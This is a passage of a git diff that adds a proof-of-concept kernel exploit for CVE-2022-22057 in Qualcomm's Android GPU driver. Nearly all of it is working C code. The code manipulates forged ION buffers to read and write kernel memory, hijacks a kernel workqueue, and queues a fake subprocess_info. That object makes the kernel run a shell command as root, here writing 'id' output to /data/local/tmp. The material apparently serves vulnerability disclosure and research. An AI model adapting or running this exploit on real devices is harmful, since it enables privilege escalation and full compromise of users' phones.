ION_DMA_SIZE); + err(1, "Failed to find ion region for wq_ptr_fd\n"); + } + + int wq_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (wq_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for wq_fd\n"); + } + struct ion_buffer* wq_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + + uint64_t pwq_addr = 0; + for (int i = 0; i < 3; i++) { + pwq_addr = get_pwq_addr(wq_fd, wq_buf, table_vaddr, 
table_region, wq_addr); + if (pwq_addr != 0) break; + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + wq_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (wq_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for wq_fd\n"); + } + wq_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + } + + if (pwq_addr == 0) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to get pwq_addr\n"); + } + + int pwq_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (pwq_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for pwq_fd\n"); + } + struct ion_buffer* pwq_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + + uint64_t pwq_region = 0; + uint64_t pool_addr = 0; + for (int i = 0; i < 3; i++) { + pool_addr = map_pwq(pwq_fd, pwq_buf, table_vaddr, table_region, pwq_addr, &pwq_region); + if (pool_addr != 0) break; + munmap((void*)page_align(pwq_region), 0x1000); + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + pwq_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (pwq_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for pwq_fd\n"); + } + pwq_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + } + if (pool_addr == 0) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to map pwq_addr\n"); + } + + ion_dma_regions[1] = pwq_region; + int pool_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (pool_fd == -1) { + repair_heap(ion_heap, 
ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for pool_fd\n"); + } + struct ion_buffer* pool_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + uint64_t pool_region = 0; + for (int i = 0; i < 3; i++) { + uint64_t worklist = map_pwq_pool(pool_fd, pool_buf, table_vaddr, table_region, pool_addr, &pool_region); + if (pool_region != 0) break; + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + pool_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (pool_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for pool_fd\n"); + } + pool_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + } + if (pool_region == 0) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to map_pwq_pool\n"); + } + ion_dma_regions[2] = pool_region; + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + + setup_sub_info(table_region, table_vaddr, kernel_shift, table_vaddr + 128, table_region + 128); + printf("queue work\n"); + sleep(1); + migrate_to_cpu(0); + + int queue_res = 0; + for (int i = 0; i < 3; i++) { + queue_res = queue_work((uint8_t*)pool_region, pool_addr, (uint8_t*)pwq_region, pwq_addr, table_region, table_vaddr, pool_addr + WORKLIST_OFF); + if (queue_res == 0) break; + printf("[-] Failed to run command, retry\n"); + setup_sub_info(table_region, table_vaddr, kernel_shift, table_vaddr + 128, table_region + 128); + sleep(1); + } + if (queue_res == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "failed to queue work\n"); + } + printf("finished queue work\n"); + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + 
sleep(1); + close(ion_fd); + printf("finished spraying\n"); + + close_unused_fds(&(syncfds[0]), SYNC_FILE_NUM, -1); + printf("finished\n"); + +} diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/work_queue_utils.c b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/work_queue_utils.c new file mode 100644 index 0000000..92721d0 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/work_queue_utils.c @@ -0,0 +1,307 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "work_queue_utils.h" +#include "addr_utils.h" +#include "ion_utils.h" +#include "fake_obj_util.h" +#include "cpu_utils.h" +#include "kgsl_ioctl.h" + +//workqueue_struct::numa_pwq_tbl +#define NUMA_PWQ_TBL_OFF 0x110 +//pool_workqueue::pool +#define PWQ_POOL_OFF 0x0 +//pool_workqueue::refcnt +#define REFCNT_OFF 0x18 +//pool_workqueue::work_color +#define WORK_COLOR_OFF 0x10 +//pool_workqueue::nr_in_flight +#define NR_IN_FLIGHT 0x1c +//pool_workqueue::nr_active +#define NR_ACTIVE 0x58 +//pool_workqueue::max_active +#define MAX_ACTIVE 0x5c +//work_struct::entry +#define WORK_STRUCT_ENTRY 0x8 + +#define WORK_STRUCT_COLOR_SHIFT 4ul + +#define CALL_USERMODE_OFF 0x16b5434ul + +//run_cmd.envp +#define RUN_CMD_ENVP_OFF 0x2c8d158 + +#define WORK_STRUCT_PENDING 1 + +#define WORK_STRUCT_PWQ 4 + +//Padding between compilers not reliable, so use hardcoded offsets +#define SUB_INFO_COMPLETE 0x30 + +#define SUB_INFO_PATH 0x38 + +#define SUB_INFO_ARGV 0x40 + +#define SUB_INFO_ENVP 0x48 + +#define SUB_INFO_FUNC 0x18 + +#define SUB_INFO_WAIT 0x58 + +#define SUB_INFO_RET 0x5c + +#define SUB_INFO_SIZE 128 + +#define COMPLETION_LIST_OFF (0x8 + 0x8) + +struct work_struct { + uint64_t data; + struct list_head entry; + uint64_t func; +}; + +struct subprocess_info { + struct work_struct work; + struct completion *complete; + uint64_t path; + uint64_t argv; + uint64_t envp; + void *file; + int wait; + int retval; + int pid; + void* 
init; + void* cleanup; + void *data; +}; + +void setup_sub_info(uint8_t* sub_info, uint64_t sub_info_vaddr, uint64_t kernel_shift, uint64_t arg_vaddr, uint8_t* arg_region) { + memset(sub_info, 0, SUB_INFO_SIZE); + const char* path = "/system/bin/sh"; + + const char* arg1 = "-c"; + const char* cmd = "/system/bin/id > /data/local/tmp/id.txt"; + memset(arg_region, 0, 0x280); + memcpy(arg_region + 0x80, path, strlen(path)); + + memcpy(arg_region + 0x100, arg1, strlen(arg1)); + memcpy(arg_region + 0x180, cmd, strlen(cmd)); + uint64_t* argv = (uint64_t*)arg_region; + + argv[0] = arg_vaddr + 0x80; + argv[1] = arg_vaddr + 0x100; + argv[2] = arg_vaddr + 0x180; + argv[3] = 0; + + *((uint64_t*)(sub_info + SUB_INFO_FUNC)) = CALL_USERMODE_OFF + KERNEL_VBASE + kernel_shift; + + *((uint64_t*)(sub_info + SUB_INFO_PATH)) = arg_vaddr + 0x80; + *((uint64_t*)(sub_info + SUB_INFO_ARGV)) = arg_vaddr; + + *((uint64_t*)(sub_info + SUB_INFO_ENVP)) = RUN_CMD_ENVP_OFF + KERNEL_VBASE + kernel_shift; + + uint64_t complete_addr = arg_vaddr + 0x200; + *((uint64_t*)(sub_info + SUB_INFO_COMPLETE)) = complete_addr; + uint8_t* completion = arg_region + 0x200; + *((uint64_t*)(completion + COMPLETION_LIST_OFF)) = complete_addr + COMPLETION_LIST_OFF; + *((uint64_t*)(completion + COMPLETION_LIST_OFF + 0x8)) = complete_addr + COMPLETION_LIST_OFF; + + *((uint32_t*)(sub_info + SUB_INFO_WAIT)) = 0; + *((uint32_t*)(sub_info + SUB_INFO_RET)) = 0xfe; + +} + +static inline int work_color_to_flags(int color) { + return color << WORK_STRUCT_COLOR_SHIFT; +} + +uint8_t* map_addr_to_ion(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t vaddr) { + uint64_t phys_addr = virt_to_phys(vaddr); + uint64_t offset = phys_addr % 0x1000; + patch_ion_buffer(buffer, table_vaddr, table_region, phys_addr, 0x1000); + uint64_t len = 0x1000; + void* ion_region = mmap(NULL, len, PROT_READ|PROT_WRITE, MAP_SHARED, ion_dma_fd, 0); + if (ion_region == MAP_FAILED) { + return MAP_FAILED; + } + 
return (uint8_t*)(ion_region + offset); +} + +uint64_t get_wq_addr(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t wq_ptr_addr) { + printf("wq_ptr_addr: %lx\n", wq_ptr_addr); + uint8_t* region = map_addr_to_ion(ion_dma_fd, buffer, table_vaddr, table_region, wq_ptr_addr); + if (region == MAP_FAILED) { + printf("get_wq_addr failed\n"); + return 0; + } + uint64_t* addr_ptr = (uint64_t*)region; + uint64_t wq_addr = *addr_ptr; + munmap((void*)page_align((uint64_t)region), 0x1000); + return wq_addr; +} + +uint64_t get_pwq_addr(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t wq_addr) { + printf("wq_addr: %lx\n", wq_addr); + uint8_t* region = map_addr_to_ion(ion_dma_fd, buffer, table_vaddr, table_region, wq_addr); + if (region == MAP_FAILED) { + printf("get_pwq_addr failed\n"); + return 0; + } + uint64_t* addr_ptr = (uint64_t*)(region + NUMA_PWQ_TBL_OFF); + uint64_t pwq_addr = *addr_ptr; + printf("pwq_addr %lx\n", pwq_addr); + munmap((void*)page_align((uint64_t)region), 0x1000); + return pwq_addr; +} + +uint64_t map_pwq(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t pwq_addr, uint64_t* pwq_region) { + uint8_t* region = map_addr_to_ion(ion_dma_fd, buffer, table_vaddr, table_region, pwq_addr); + if (region == MAP_FAILED) { + printf("map_pwq failed\n"); + return 0; + } + *pwq_region = (uint64_t)region; + uint64_t* addr_ptr = (uint64_t*)(region + PWQ_POOL_OFF); + uint64_t pool_addr = *addr_ptr; + printf("pool_addr %lx\n", pool_addr); + return pool_addr; +} + +uint64_t map_pwq_pool(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t pool_addr, uint64_t* pool_region) { + uint8_t* region = map_addr_to_ion(ion_dma_fd, buffer, table_vaddr, table_region, pool_addr); + if (region == MAP_FAILED) { + printf("map_pwq_pool failed\n"); + return 0; + } + *pool_region = (uint64_t)region; + uint64_t* 
worklist = (uint64_t*)(region + WORKLIST_OFF);
+ printf("worklist %lx %lx\n", worklist[0], worklist[1]);
+ return *worklist;
+}
+
+//Mirrors the kernel's insert_work(): bumps the pwq accounting counters
+//(refcnt, nr_active, nr_in_flight[color]) and splices the fake work entry
+//into the worker_pool worklist, but only if the list head still points to
+//itself (pool idle). On a lost race the counters are rolled back and -1 is
+//returned; 0 on success. noinline keeps the critical section compact.
+__attribute__((noinline)) int insert_work(uint32_t* nr_active, uint32_t* refcnt, uint32_t* nr_in_flight, volatile uint64_t* worklist, uint64_t work_entry_addr, uint64_t worklist_addr) {
+ uint32_t nr_act = *nr_active;
+ uint32_t inflight = *nr_in_flight;
+ uint32_t refcount = *refcnt;
+ *refcnt = refcount + 1;
+ *nr_active = nr_act + 1;
+ *nr_in_flight = inflight + 1;
+ if (worklist_addr == *worklist) {
+ //Empty list: make head.next and head.prev point at our fake work entry.
+ worklist[0] = work_entry_addr;
+ worklist[1] = work_entry_addr;
+ return 0;
+ }
+ //Pool was not idle — undo the counter updates and let the caller retry.
+ *refcnt = refcount;
+ *nr_active = nr_act;
+ *nr_in_flight = inflight;
+ return -1;
+}
+
+//Best-effort lock on the worker_pool's spinlock word, taken from userspace.
+//NOTE(review): the check-then-set is not atomic (no compare-and-swap), so
+//this only reduces — not eliminates — races with the kernel; the caller's
+//retry loop in queue_work() tolerates occasional failures.
+void spin_lock(volatile uint32_t* lock) {
+ while (*lock);
+ *lock = 1;
+ return;
+}
+
+//Kicks the kgsl driver with a harmless IOCTL_KGSL_TIMELINE_QUERY so that a
+//kworker on the target workqueue wakes up and processes our queued work.
+void wake_up_queue() {
+ int kgsl_fd = open("/dev/kgsl-3d0", O_RDONLY);
+ struct kgsl_timeline_val param = {0};
+ //FIX: was the mojibake `¶m` (HTML-entity corruption of `&param`,
+ //`&para;` == ¶) — ioctl needs the address of the argument struct.
+ ioctl(kgsl_fd, IOCTL_KGSL_TIMELINE_QUERY, &param);
+ close(kgsl_fd);
+}
+
+//Queues the fake subprocess_info (`sub_info`, kernel address
+//`sub_info_vaddr`) on the hijacked workqueue by writing directly into the
+//user-space mappings of the pool_workqueue (`pwq_region`) and worker_pool
+//(`pool_region`), then waits for a kworker to execute it. All MAX_ACTIVE /
+//NR_ACTIVE / REFCNT_OFF / WORK_COLOR_OFF / NR_IN_FLIGHT / WORKLIST_OFF
+//offsets are firmware-specific. Returns 0 if the usermode command reported
+//success, -1 otherwise.
+int queue_work(uint8_t* pool_region, uint64_t pool_addr, uint8_t* pwq_region, uint64_t pwq_addr, uint8_t* sub_info, uint64_t sub_info_vaddr, uint64_t worklist_addr) {
+ uint32_t* max_active = (uint32_t*)(pwq_region + MAX_ACTIVE);
+ uint32_t* nr_active = (uint32_t*)(pwq_region + NR_ACTIVE);
+ uint32_t* refcnt = (uint32_t*)(pwq_region + REFCNT_OFF);
+ uint32_t* work_color_ptr = (uint32_t*)(pwq_region + WORK_COLOR_OFF);
+ uint32_t* nr_in_flight = (uint32_t*)(pwq_region + NR_IN_FLIGHT);
+ volatile uint64_t* worklist = (uint64_t*)(pool_region + WORKLIST_OFF);
+ uint64_t work_entry_addr = sub_info_vaddr + WORK_STRUCT_ENTRY;
+ //The pool's spinlock sits at the start of the worker_pool structure.
+ uint32_t* lock = (uint32_t*)(pool_region);
+
+ //Pin to CPU 0 — presumably the CPU whose per-cpu pool we mapped.
+ migrate_to_cpu(0);
+ struct work_struct* work = (struct work_struct*)sub_info;
+ //Pre-link our entry so the list is consistent the moment it is spliced in.
+ work->entry.next = worklist_addr;
+ work->entry.prev = worklist_addr;
+ int refcount = *refcnt;
+ if (refcount == 0) {
+ //A dead pwq would never run our work; bail out early.
+ printf("memory pool has refcount 0\n");
+ return -1;
+ }
+ printf("max_active %u nr_active %u\n", *max_active, *nr_active);
+ uint32_t
work_color = *work_color_ptr;
+ uint32_t work_flags = work_color_to_flags(work_color);
+ //work_struct::data encodes pending flag, "points at a pwq" flag, the work
+ //color, and the pwq kernel address — same packing the kernel uses.
+ work->data = (WORK_STRUCT_PENDING | WORK_STRUCT_PWQ | work_flags | pwq_addr);
+ printf("queuing work, waiting to aquire spin lock\n");
+ int ret = 0;
+ //Retry insertion under the (best-effort) pool lock until the worklist is
+ //observed empty, up to 1000 attempts at 100us intervals.
+ for (int i = 0; i < 1000; i++) {
+ spin_lock(lock);
+ ret = insert_work(nr_active, refcnt, nr_in_flight + work_color, worklist, work_entry_addr, worklist_addr);
+ if (ret == -1) {
+ *lock = 0;
+ } else {
+ break;
+ }
+ usleep(100);
+ }
+ if (ret == 0) {
+ //Only release the lock on success; on total failure we never took it last.
+ *lock = 0;
+ } else {
+ return -1;
+ }
+ printf("work_queued\n");
+ sleep(1);
+ //If no kworker has picked the entry up yet, poke the queue once.
+ if (*worklist == work_entry_addr) {
+ wake_up_queue();
+ }
+
+ //Move off CPU 0 so the kworker pinned there can run our work.
+ migrate_to_cpu(1);
+ struct timeval start, end;
+ long micros_used, secs_used;
+ int try_wake_up = 0;
+
+ gettimeofday(&start, NULL);
+
+ //Poll until the work entry leaves the worklist (i.e. it was processed).
+ //After 2s of no progress, re-kick the queue up to 3 times, then fall back
+ //to asking the operator to wake the device.
+ while(*worklist == work_entry_addr) {
+ gettimeofday(&end, NULL);
+ secs_used=(end.tv_sec - start.tv_sec);
+ if (secs_used > 2) {
+ if (try_wake_up < 3) {
+ wake_up_queue();
+ try_wake_up++;
+ gettimeofday(&start, NULL);
+ } else {
+ printf("[-] Work queue may have stalled, try pressing power button to wake up\n");
+ gettimeofday(&start, NULL);
+ }
+ }
+ usleep(1000);
+ }
+ printf("work processed\n");
+ printf("complete %lx\n", *((uint64_t*)(sub_info + SUB_INFO_COMPLETE)));
+ //SUB_INFO_RET was seeded with 0xfe; the kernel overwrites it with the
+ //usermode helper's exit status (0 on success).
+ uint32_t cmd_ret = *((uint32_t*)(sub_info + SUB_INFO_RET));
+ printf("ret %d\n", cmd_ret);
+ printf("nr_active %u\n", *nr_active);
+ printf("worklist %lx\n", worklist[0]);
+ printf("work next %lx\n", work->entry.next);
+ if (*((uint32_t*)(sub_info + SUB_INFO_RET)) == 0) {
+ printf("[+] successfully run command and added id.txt in /data/local/tmp\n");
+ } else {
+ printf("[-] Failed to run command, error code %d\n", cmd_ret);
+ return -1;
+ }
+ sleep(1);
+
+ return 0;
+}
diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/work_queue_utils.h b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/work_queue_utils.h new file mode 100644 index 0000000..d901fb2 --- /dev/null +++
b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/work_queue_utils.h @@ -0,0 +1,26 @@
+#ifndef WORK_QUEUE_UTILS
+#define WORK_QUEUE_UTILS
+
+#include "fake_obj_util.h"
+
+//Kernel-image offset of the system_unbound_wq workqueue pointer
+//(firmware-specific — see README).
+#define SYSTEM_UNBOUND_WQ_OFF 0x2b8f7f8ul
+
+//Kernel-image offset of the kgsl_driver global (firmware-specific).
+#define KGSL_DRIVER_OFF 0x2d0a000
+
+//kgsl_driver::memqueue — presumably the field at +0x518; TODO confirm.
+#define KGSL_MEMQUEUE_OFF (KGSL_DRIVER_OFF + 0x518)
+
+//worker_pool::worklist
+#define WORKLIST_OFF 0x20
+
+//Reads the workqueue_struct pointer stored at kernel address wq_ptr_addr.
+uint64_t get_wq_addr(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t wq_ptr_addr);
+
+//Follows workqueue_struct -> pool_workqueue; returns the pwq kernel address.
+uint64_t get_pwq_addr(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t wq_addr);
+
+//Maps the pwq page into userspace (via *pwq_region); returns pwq->pool.
+uint64_t map_pwq(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t pwq_addr, uint64_t* pwq_region);
+
+//Maps the worker_pool page (via *pool_region); returns worklist.next.
+uint64_t map_pwq_pool(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t pool_addr, uint64_t* pool_region);
+
+//Queues the fake subprocess_info on the hijacked workqueue; 0 on success.
+int queue_work(uint8_t* pool_region, uint64_t pool_addr, uint8_t* pwq_region, uint64_t pwq_addr, uint8_t* sub_info, uint64_t sub_info_vaddr, uint64_t worklist_addr);
+
+//Fills sub_info/arg_region with the fake subprocess_info and its arguments.
+void setup_sub_info(uint8_t* sub_info, uint64_t sub_info_vaddr, uint64_t kernel_shift, uint64_t arg_vaddr, uint8_t* arg_region);
+#endif